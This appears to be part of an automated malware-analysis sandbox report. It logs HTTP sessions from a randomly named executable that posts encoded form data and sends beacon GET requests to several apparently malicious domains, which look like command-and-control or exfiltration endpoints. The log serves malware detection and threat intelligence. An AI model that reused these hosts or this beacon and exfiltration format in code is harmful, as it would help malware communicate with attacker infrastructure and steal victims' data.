                                                                    35192.168.2.5500173.33.130.190801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:58.529898882 CET1758OUTPOST /zlyl/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.dto20.shop
                                                                    Origin: http://www.dto20.shop
                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 74 61 4c 51 31 62 71 37 48 76 4e 64 75 7a 47 63 51 61 58 33 66 4f 71 47 32 35 6c 55 43 6c 78 6c 59 69 48 39 53 38 58 4a 31 69 61 65 47 41 6a 4e 43 4a 32 4f 45 65 65 6a 46 73 61 67 6b 2b 35 73 48 45 50 38 70 70 44 49 61 49 65 53 5a 33 75 71 69 6c 72 6b 38 4c 50 6e 78 68 4b 50 71 78 6f 6b 63 33 6b 63 32 49 59 4e 70 54 51 79 50 52 64 30 51 77 48 65 65 75 39 53 41 44 6a 69 4a 30 48 55 37 49 39 74 32 7a 57 44 5a 79 42 48 45 69 35 4a 75 72 71 72 69 41 6c 36 4b 61 55 63 44 77 49 6c 59 77 4b 55 48 53 59 30 52 54 42 48 46 7a 6b 6c 75 66 35 74 6d 35 6c 42 6a 47 2b 48 48 72 4b 68 63 63 59 71 5a 74 31 58 7a 56 6a 69 34 73 6a 54 33 4a 54 6c 31 54 2f 53 34 45 4c 63 4b 33 56 50 7a 43 4a 50 62 6e 57 55 59 2b 31 69 76 68 4b 41 35 67 33 6b 65 45 4d 75 63 6c 54 77 78 51 36 76 49 75 71 6f 43 33 74 73 43 2b 55 42 65 42 37 69 74 76 58 68 71 79 51 6c 4d 6b 67 39 6c 6d 5a 4d 48 59 4d 63 42 76 4a 6f 50 31 62 74 51 34 51 55 6c 4c 55 78 4b 33 4f 37 4a 74 61 46 66 45 79 4d 35 [TRUNCATED]
                                                                    Data Ascii: vxPD=DnTeUn8bQO0ftaLQ1bq7HvNduzGcQaX3fOqG25lUClxlYiH9S8XJ1iaeGAjNCJ2OEeejFsagk+5sHEP8ppDIaIeSZ3uqilrk8LPnxhKPqxokc3kc2IYNpTQyPRd0QwHeeu9SADjiJ0HU7I9t2zWDZyBHEi5JurqriAl6KaUcDwIlYwKUHSY0RTBHFzkluf5tm5lBjG+HHrKhccYqZt1XzVji4sjT3JTl1T/S4ELcK3VPzCJPbnWUY+1ivhKA5g3keEMuclTwxQ6vIuqoC3tsC+UBeB7itvXhqyQlMkg9lmZMHYMcBvJoP1btQ4QUlLUxK3O7JtaFfEyM5n1kEX9eZYfPGfx4OXMaXeIWL0yuOnzRSVgqpJWgzcylDT0SnKEqEO2ZOasMh8IsJl1QtxFiAbyTQILo4Fwco3R2yd71gqW0Sbb6Wz/vbxl8m7MrGhyaojG9O9veC+u9+l0flV8mbqs/+6O/Z0PQvq3KaBwVXl66XDR06h2Oix3D7SrS/joJ/dHtwz1wQmBtbuB/jcMZ6KZKvFqHEJ7qcAjzZUSx9uFMVamEEKjs105+9FVVbwJqkJE0GVMENjrTK+74YsN+L5EcGWubWoj12P3LG94XGMXUM1P6spnlmdfKxCWOMhOZQiQ+TNZognCtRQ0T53pTZRbGF4GgHNIVOAQmzbBNU0LY7T31jAs3XtDWsL6K0z229sWf2Xiz3R0gXpjhTHst4So6v3CAq+xQomeODFfeBT96BGITRXEd+aEHFdiia4UbaXZpyJx5Ji7A3HmFq0eVWsWoY/Pzv7Wr6XgVALdSbybTA9LuFUZbG7Z5Jwkpa5XuWyjvSnvvLkRPEL/zfYy2bNRdxGv31hvmZ+vXI58D2vtzelo+NJWFpkccQVhjhr2FhxVucN2gqPi8CTNhWaYtkgwCgaGFJiSpG9Ofl1XGDk+Yrc4y6gUztLOUpre3sE+vX9zC3M+4Eo891H4+0wBHail366cVEJsAAvMm8ivfqtCKgxq [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.5500183.33.130.190801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:01.072371960 CET469OUTGET /zlyl/?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.dto20.shop
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:59:01.726975918 CET408INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Wed, 30 Oct 2024 03:59:01 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 268
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 78 50 44 3d 4f 6c 37 2b 58 52 39 62 65 2b 30 70 36 5a 76 43 39 71 4b 56 45 76 30 48 6a 30 54 47 61 62 2b 4b 52 2b 32 76 31 74 38 47 43 6e 46 61 41 67 33 64 65 63 2f 30 30 32 4b 69 59 6a 2f 61 45 75 65 63 47 4c 43 6d 56 74 71 42 7a 66 55 79 48 68 58 69 70 65 32 31 55 4b 6d 59 53 31 32 41 76 53 4c 55 36 75 75 48 2f 68 71 58 39 77 63 41 4d 32 30 66 6d 70 59 6f 75 68 73 59 58 6a 56 76 59 44 47 4b 62 77 3d 3d 26 37 4a 48 3d 62 76 53 50 6c 48 6e 48 51 34 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A"}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.550019144.34.186.85801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:06.812457085 CET736OUTPOST /ni9w/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.h5hph710am.site
                                                                    Origin: http://www.h5hph710am.site
                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 35 61 6f 42 6d 78 39 34 79 73 54 33 54 69 73 67 46 62 2b 41 2b 6a 35 4d 48 50 32 72 6e 62 77 48 61 70 30 43 69 42 7a 55 33 2b 77 41 51 69 36 69 39 74 31 67 51 4c 68 55 6e 64 74 50 7a 75 6b 41 4f 33 67 42 49 67 30 69 4b 4a 34 38 53 56 44 45 31 4d 32 63 30 57 64 6f 75 44 42 52 4f 54 51 56 2f 77 30 6d 39 4f 39 71 44 44 6f 41 31 78 76 6f 36 53 70 63 70 6d 5a 6a 70 48 6a 68 70 78 68 50 48 6f 57 64 4e 48 6f 6d 39 44 4a 38 62 2b 66 61 34 72 73 77 54 4b 6a 79 45 68 36 54 6b 4f 68 61 37 4b 6b 71 2b 5a 56 43 6d 58 46 77 48 63 70 52 2f 55 43 74 61 53 37 4b 74 56 73 3d
                                                                    Data Ascii: vxPD=xTyynNMo1ISp5aoBmx94ysT3TisgFb+A+j5MHP2rnbwHap0CiBzU3+wAQi6i9t1gQLhUndtPzukAO3gBIg0iKJ48SVDE1M2c0WdouDBROTQV/w0m9O9qDDoA1xvo6SpcpmZjpHjhpxhPHoWdNHom9DJ8b+fa4rswTKjyEh6TkOha7Kkq+ZVCmXFwHcpR/UCtaS7KtVs=
                                                                    Oct 30, 2024 04:59:07.453797102 CET720INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:07 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.550020144.34.186.85801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:09.360440969 CET756OUTPOST /ni9w/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.h5hph710am.site
                                                                    Origin: http://www.h5hph710am.site
                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 32 61 59 42 67 57 70 34 6a 38 54 30 50 53 73 67 50 37 2b 4d 2b 6a 6c 4d 48 4f 79 37 6d 70 6b 48 64 4d 59 43 68 41 7a 55 30 2b 77 41 59 43 36 72 67 39 31 70 51 4c 74 71 6e 64 42 50 7a 75 77 41 4f 33 51 42 49 58 67 68 4c 5a 34 2b 4a 6c 44 38 78 4d 32 63 30 57 64 6f 75 48 70 72 4f 54 49 56 38 42 45 6d 38 76 39 72 4e 6a 6f 42 79 78 76 6f 2b 53 70 59 70 6d 59 41 70 43 36 47 70 30 74 50 48 74 71 64 4e 53 63 68 6d 54 49 35 66 2b 66 50 35 61 5a 53 65 49 66 62 5a 69 33 6c 35 76 52 38 33 63 4a 41 6b 37 64 71 31 33 70 49 58 50 68 6d 75 6b 6a 45 41 78 72 36 7a 43 34 46 6b 6c 31 6e 6c 30 5a 64 65 67 6b 63 50 4a 54 72 52 77 57 65
                                                                    Data Ascii: vxPD=xTyynNMo1ISp2aYBgWp4j8T0PSsgP7+M+jlMHOy7mpkHdMYChAzU0+wAYC6rg91pQLtqndBPzuwAO3QBIXghLZ4+JlD8xM2c0WdouHprOTIV8BEm8v9rNjoByxvo+SpYpmYApC6Gp0tPHtqdNSchmTI5f+fP5aZSeIfbZi3l5vR83cJAk7dq13pIXPhmukjEAxr6zC4Fkl1nl0ZdegkcPJTrRwWe
                                                                    Oct 30, 2024 04:59:10.005563974 CET720INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.550021144.34.186.85801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:11.905972958 CET1773OUTPOST /ni9w/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.h5hph710am.site
                                                                    Origin: http://www.h5hph710am.site
                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 32 61 59 42 67 57 70 34 6a 38 54 30 50 53 73 67 50 37 2b 4d 2b 6a 6c 4d 48 4f 79 37 6d 6f 63 48 64 36 4d 43 69 6e 6e 55 31 2b 77 41 53 69 36 6d 67 39 30 35 51 49 63 74 6e 64 64 78 7a 74 49 41 50 56 59 42 41 47 67 68 42 5a 34 2b 57 56 44 48 31 4d 33 65 30 57 73 76 75 44 31 72 4f 54 49 56 38 43 63 6d 31 65 39 72 50 6a 6f 41 31 78 76 65 36 53 70 38 70 6c 70 37 70 43 50 78 70 6e 6c 50 47 4e 61 64 50 67 45 68 71 54 49 33 53 65 65 4b 35 61 46 6b 65 4d 2f 35 5a 6a 7a 50 35 6f 6c 38 31 71 34 4d 6e 5a 4e 4a 70 52 70 46 55 59 78 44 34 30 6a 64 48 44 6a 65 75 54 45 58 75 42 35 4b 79 53 56 6e 56 52 77 4a 53 74 36 6b 62 48 62 68 30 45 59 59 35 53 5a 47 53 7a 33 33 36 61 49 70 6a 50 69 56 71 56 74 30 71 32 6e 32 48 61 78 45 6b 6d 4f 74 63 32 7a 36 43 36 70 6f 6c 6b 37 61 73 44 78 53 36 79 47 7a 37 6e 39 76 71 6a 51 5a 47 62 53 4e 69 52 6b 2f 30 76 63 42 76 72 70 78 64 72 76 6c 77 63 4b 6b 2f 41 55 38 79 50 41 32 76 57 61 34 47 38 51 44 7a 72 6c 7a 67 61 31 31 32 [TRUNCATED]
                                                                    Data Ascii: vxPD=xTyynNMo1ISp2aYBgWp4j8T0PSsgP7+M+jlMHOy7mocHd6MCinnU1+wASi6mg905QIctnddxztIAPVYBAGghBZ4+WVDH1M3e0WsvuD1rOTIV8Ccm1e9rPjoA1xve6Sp8plp7pCPxpnlPGNadPgEhqTI3SeeK5aFkeM/5ZjzP5ol81q4MnZNJpRpFUYxD40jdHDjeuTEXuB5KySVnVRwJSt6kbHbh0EYY5SZGSz336aIpjPiVqVt0q2n2HaxEkmOtc2z6C6polk7asDxS6yGz7n9vqjQZGbSNiRk/0vcBvrpxdrvlwcKk/AU8yPA2vWa4G8QDzrlzga112Z+Rx2V+cyOXm/vzWnUjPj8gaHWwhyVk4BcqSmBQFIkzESynlHO2/kEjiSqRu3mGR8xlWdWGSs9SCOdA2+I6gVhFaA0gCAVwL1dtg+TdeTMoA1qCAPl71dS/egvCuvWGGptWyNdh2WHsyvU1UN4y31ZEPqoBpRBRuiXxnfme3tJhRrDKYDHC87ji7y/Ayn5pUDGYpS+D0fro+5mjZZwxAePuT4Nzazqum3mOS4acQyXdk9D2FpQwZfok/Dk4PZ/QIuzCxn5zMAE1it629o+LMqr4xJVe40XdlbEjDsGnZkgGFbFcGseMPtZuaC65zDY5w55/k1ACrhXoZGAqNLogT+TTH2iRo6BxU3hPRxMkzkpoHbqJ9T5zdxLKpx5y1C320k96Da333ehXaEDaF7jsownsZVswDvn+EsuC510ml8xq4wil8uKuZNUkPmmOr5ZJnpG/k2gaAuB+HCA3kPva3ArQ80JOwNYn53C9MGewwze12TMl8l69d3W/SoEin3BnEj564Kx5gbRpSkLrWwfe5NpS/6FDOL1+11a0HNjluv4ukcCKuyEclJCa4inykEdKIaDk+FfnVOlLVMEgPGXRhqzR5MlCG8YjccZwvmx7i6OMadgrf9E96tdz8QtfGihm6Hec6SWEhTWA+j081TOwtGkvKC9n/UHF/+0 [TRUNCATED]
                                                                    Oct 30, 2024 04:59:12.557594061 CET720INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.550022144.34.186.85801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:14.457504988 CET474OUTGET /ni9w/?vxPD=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.h5hph710am.site
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:59:15.088462114 CET720INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:15 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.550023136.143.186.12801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:20.388447046 CET730OUTPOST /1q08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.lanxuanz.tech
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 31 35 63 6a 34 75 66 66 70 58 43 35 4a 78 73 6f 62 79 4d 33 71 79 68 39 76 37 41 4b 6d 35 70 6e 42 50 53 4a 56 64 50 4d 4d 43 6b 61 49 78 75 62 67 44 78 6a 77 33 67 4d 56 73 35 48 6e 53 37 50 31 62 4b 32 39 6a 30 38 79 62 76 61 4d 35 63 51 50 4a 67 44 78 45 61 4b 65 44 53 78 71 63 54 36 63 31 76 47 2b 33 4d 4e 79 76 43 34 58 72 52 65 61 38 32 79 56 71 55 54 5a 5a 75 4b 34 2f 75 36 61 41 67 36 5a 4c 30 6e 7a 37 63 44 4d 55 6e 71 70 59 2f 48 37 65 4c 72 4c 63 49 5a 46 56 35 5a 5a 51 79 62 4a 69 5a 31 6d 34 68 66 50 6f 50 36 4d 51 6d 38 61 6d 72 78 64 30 3d
                                                                    Data Ascii: vxPD=pTM1zeR2Sjipb15cj4uffpXC5JxsobyM3qyh9v7AKm5pnBPSJVdPMMCkaIxubgDxjw3gMVs5HnS7P1bK29j08ybvaM5cQPJgDxEaKeDSxqcT6c1vG+3MNyvC4XrRea82yVqUTZZuK4/u6aAg6ZL0nz7cDMUnqpY/H7eLrLcIZFV5ZZQybJiZ1m4hfPoP6MQm8amrxd0=
